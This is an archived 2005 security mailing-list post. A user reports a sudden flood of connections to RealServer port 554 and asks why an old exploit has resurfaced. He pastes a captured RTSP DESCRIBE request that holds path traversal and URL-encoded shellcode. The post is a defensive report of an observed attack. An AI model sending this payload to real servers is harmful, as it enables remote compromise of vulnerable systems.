THC's RealServer (port 554) exploit?

From: Stefan Pettersson (
Date: 02/16/05

  • Next message: Collin: "Re: New MSN worm?"
    Date: Wed, 16 Feb 2005 17:53:07 +0100

    Hi, I'm kinda new in this field so, please bear with me.

    I've got a massive increase on connection requests to port 554 (RealServer) this
    afternoon. I haven't given much thought about earlier connections but when looking
    through the firewall log I see that I've gotten a few in the past as well. There is
    however no doubt that the traffic has increased _greatly_ this afternoon. (Almost)
    every attempt are sent by a different address. I don't know if these are decoys

    I was curious about this so I opened the port up and ran

    nc -l -p 554 > output

    to see what the probes tried to send. What I got was definately an exploit attempt.

    DESCRIBE /../../../../ΜΜ%eb%15%b9%8b%e6%13%41%81%f1%39%e6%13%41%5e%80%74%31%ff%9e%e2%f9%eb%05%e8%e6%ff%ff%ff%ad%45%fa%15%dd%ae%15%de%92%15%ee%82%33%15%e6%96%76%db%9e%9e%9e%cd%c8%15%c1%a2%15%c2%a5%e6%9d%41%cd%15%c5%be%9d%41%cd%1d%5d%9a%15%ad%9d%69%ad%57%32%ac%56%5f%5f%9b%1a%5e%eb%68%b5%54%eb%77%c6%b5%46%4f%75%c0%9d%c0%ba%9d%41%f8%15%95%15%c0%82%9d%41%15%9a%15%9d%59%c0%c5%61%7e%c0%f6%ad%ac%9e%9e%f6%e9%ed%ac%c1%ca%24%0c%f0%9a%1a%61%48%15%66%1f%72%9e%9c%9e%9e%15%72%cd%f4%9f%f4%9c%24%1d%cd%1d%9e%61%48%cd%cd%f6%4d%43%8d%24%f6%9c%9e%7e%ec%15%4a%15%46%f4%8e%cc%cd%24%fd%ae%fe%c4%61%48%ce%2a%9c%ce%cb%cd%24%9e%c6%fe%7c%61%48%21%a3%36%27%f3%61%7b.smi RTSP/1.0

    I removed a "few" /../..

    Searching the web for this and found that this is an old exploit, most likely this

    But that one is almost two years old, why does it show up this much now? So suddenly.
    It has only been going on for a few hours. Is there something new that has come out
    or is it just a coincidence?

    Stefan Pettersson

  • Next message: Collin: "Re: New MSN worm?"